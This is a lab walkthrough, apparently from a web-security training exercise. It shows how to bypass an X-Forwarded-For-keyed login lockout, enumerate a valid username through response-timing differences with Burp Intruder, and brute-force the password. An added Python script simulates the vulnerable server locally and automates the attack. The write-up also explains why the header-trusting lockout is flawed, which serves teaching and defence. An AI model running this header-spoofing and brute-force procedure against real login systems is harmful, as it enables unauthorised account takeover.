After logging in with the given valid username and password, I looked around the application; there was nothing of interest.
Then I planned to log out and intercept the request when logging in again.
Send the intercepted request to Repeater (Ctrl+R).
While digging around by sending multiple incorrect passwords, I noticed that this application has some form of brute-force protection.
Let's try to bypass this protection.
Inserting an X-Forwarded-For (XFF) request header easily bypasses this protection.
The IP address used in the header is a dummy value. Whenever we are blocked after a certain number of incorrect attempts, we can change the value of X-Forwarded-For and we are ready to go.
The X-Forwarded-For (XFF) request header is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through a proxy server. The bypass works because the application keys its lockout on whatever value it finds in that header, and the header is supplied by the client, so it is trivially spoofable; an application should only honour XFF when it is set by a trusted proxy sitting in front of it, and should key its lockout on the connection address otherwise.
Now that we have solved the blocking issue, let's focus on our goal.
I tried entering a wrong password with a wrong username, and then with the correct username, to check the change in response time.
After some digging:
When I enter a wrong username it does not check the password, so the response comes back faster.
When I enter the correct username it starts checking the password.
In this case I entered a very long password, so it took longer to respond.
So what we can conclude from this is:
- The web app checks the username first; only if the username is correct does it check the password.
- If the username is incorrect it does not check the password and gives the "Invalid username and password" response.
From this conclusion we can enumerate the valid username.
Here is what we are going to do.
We will submit a long password. For the username we will use the provided wordlist, and Burp will iterate over all the usernames.
The web app will check the username first.
- If the username is incorrect the response will come back faster.
- If the username is correct it will move on to check the password; since we have provided a long password, the response will take longer.
Using this difference in response time we can find the correct username. Network jitter can hide small differences, so if the timings look noisy, make the password longer or repeat the run and compare.
Send this request to Intruder (Ctrl+I).
In Intruder:
1. First click Clear. This removes any payload positions that might be selected by default.
2. Select the X-Forwarded-For value. This is because we want to change our IP on every request so that we are not blocked.
3. Click Add to set the payload position.
4. Select the username field.
5. Click Add to set the payload position.
6. Select the attack type Pitchfork. Pitchfork advances both payload sets together, so each username is sent with its own fresh IP.
In the Payloads section:
- Select payload set 1
- Set the payload type to Numbers
- Set From to 5, because I have already used IP 5
- Set To to 106, because there are 101 usernames and we need a new IP for each username
- Set Step to 1
Now select payload set 2:
- Select the payload type Simple list
- Paste the username list, which is provided in the lab
Then start the attack.
In the results we can see that all the requests have a low response time except one, which has a noticeably higher response time. According to our theory this username is correct: since the username is correct, the web app went on to check the password, and since we provided a very long password the response took longer.
So this should be the valid username.
Now it's time to brute-force the password.
Password brute-forcing is the same as username enumeration; just remove the payload position from the username field and put the valid username we just found in it.
Then select the password field and click Add to set it as the second payload position.
Make sure the X-Forwarded-For field is still set as a payload position as well.
In the Payloads section (for payload set 1):
- Change From to 107
- Change To to 208
This gives a fresh IP range, so none of the addresses already used (and possibly already counted against) are reused.
In the Payloads section (for payload set 2):
- Paste the password list, which is provided in the lab
Then start the attack.
And we get a 302 status code for one of the passwords: the redirect means the login succeeded, so that is the valid password.
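The whole procedure above, the XFF-keyed lockout, the timing-based username enumeration and the password run, as an added example that is not code from the original writeup or from the lab. It stands up a small local HTTP server that behaves the way the text describes the target (lockout keyed on X-Forwarded-For, password only compared for a known user with a cost that grows with password length) and then drives it the way the two Intruder pitchfork attacks do. The usernames, passwords, wordlists, IP ranges and timing constants are constructed for the demo and are not the lab's real values.

```python
"""Response-timing username enumeration with X-Forwarded-For rotation.

Added example, not part of the original writeup. A tiny local server
reproduces the two behaviours the text describes:
  * lockout after a few wrong attempts per source IP, where the source
    IP is read from X-Forwarded-For (the flaw that makes rotation work);
  * the password is only compared when the username exists, and the
    comparison cost grows with password length.
The client does what the Intruder pitchfork attacks do: a fresh XFF value
per request, a very long password for enumeration, then a wordlist run
against the username that stood out. All data below is constructed.
"""
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib import parse, request
from urllib.error import HTTPError

VALID_USER, VALID_PASS = "carlos", "montoya"        # constructed, not the lab's
LOCKOUT_ATTEMPTS = 3       # wrong attempts per IP before blocking
PER_CHAR_COST = 0.0002     # simulated seconds of password check per character
CANDIDATE_USERS = ["admin", "root", "carlos", "test", "guest"]
CANDIDATE_PASSWORDS = ["123456", "password", "montoya", "letmein"]

_failures = {}             # source ip -> wrong-attempt count (server state)


class VulnerableLogin(BaseHTTPRequestHandler):
    """Login endpoint with the two weaknesses the writeup exploits."""

    def log_message(self, *args):          # silence request logging
        pass

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        form = parse.parse_qs(body.decode())
        username = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        # Trusting a client-supplied header as the lockout key is the bug.
        source_ip = self.headers.get("X-Forwarded-For", self.client_address[0])
        if _failures.get(source_ip, 0) >= LOCKOUT_ATTEMPTS:
            return self._reply(429, "You have made too many incorrect login attempts.")
        if username == VALID_USER:
            # Only a known user reaches the password comparison, and its
            # cost scales with the length of the submitted password.
            time.sleep(PER_CHAR_COST * len(password))
            if password == VALID_PASS:
                return self._reply(302, "", location="/my-account")
        _failures[source_ip] = _failures.get(source_ip, 0) + 1
        self._reply(200, "Invalid username or password.")

    def _reply(self, code, text, location=None):
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(text)))
        if location:
            self.send_header("Location", location)
        self.end_headers()
        self.wfile.write(text.encode())


class _NoRedirect(request.HTTPRedirectHandler):
    """Keep the 302 visible instead of following it (as Burp shows it)."""
    def redirect_request(self, *args, **kwargs):
        return None


_opener = request.build_opener(_NoRedirect)


def attempt(base_url, username, password, xff):
    """One login attempt with a chosen X-Forwarded-For; returns (status, seconds)."""
    data = parse.urlencode({"username": username, "password": password}).encode()
    req = request.Request(base_url + "/login", data=data, method="POST")
    req.add_header("X-Forwarded-For", xff)
    start = time.perf_counter()
    try:
        with _opener.open(req) as resp:
            status = resp.status
    except HTTPError as err:             # urllib raises on 3xx/4xx/5xx
        status = err.code
    return status, time.perf_counter() - start


def enumerate_usernames(base_url, candidates, long_password="x" * 1000):
    """Pitchfork run: one fresh IP per candidate; returns {username: seconds}."""
    return {name: attempt(base_url, name, long_password, f"10.0.0.{i + 1}")[1]
            for i, name in enumerate(candidates)}


def brute_force_password(base_url, username, wordlist, ip_offset=200):
    """Second pitchfork run on a fresh IP range; stop at the first 302."""
    for i, pw in enumerate(wordlist):
        status, _ = attempt(base_url, username, pw, f"10.0.1.{ip_offset + i}")
        if status == 302:
            return pw
    return None


def run_demo():
    """Start the server, show the lockout and its bypass, then enumerate."""
    _failures.clear()
    server = HTTPServer(("127.0.0.1", 0), VulnerableLogin)
    base = f"http://127.0.0.1:{server.server_address[1]}"
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        # Four tries from one IP: the fourth is blocked; a new XFF value is not.
        lockout = [attempt(base, "nobody", "wrong", "10.9.9.9")[0] for _ in range(4)]
        bypass = attempt(base, "nobody", "wrong", "10.9.9.10")[0]
        timings = enumerate_usernames(base, CANDIDATE_USERS)
        user = max(timings, key=timings.get)   # the timing outlier is the valid user
        password = brute_force_password(base, user, CANDIDATE_PASSWORDS)
        return {"lockout": lockout, "bypass": bypass, "timings": timings,
                "username": user, "password": password}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

Running it prints the lockout statuses (three 200s then a 429), the 200 obtained with a new header value, the per-username timings with one clear outlier, and the password that produced the 302. The redirect handler is disabled so the 302 is observed rather than followed, which is also why Burp shows the 302 directly in the Intruder results.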
Let's try to log in with the username and password we found.
When I try to log in it gives a timeout, because our own IP is still blocked from the earlier attempts.
Let's fire up Burp, enter the username and password we found, and intercept the request.
Add the X-Forwarded-For header and then forward the request.
Successfully completed.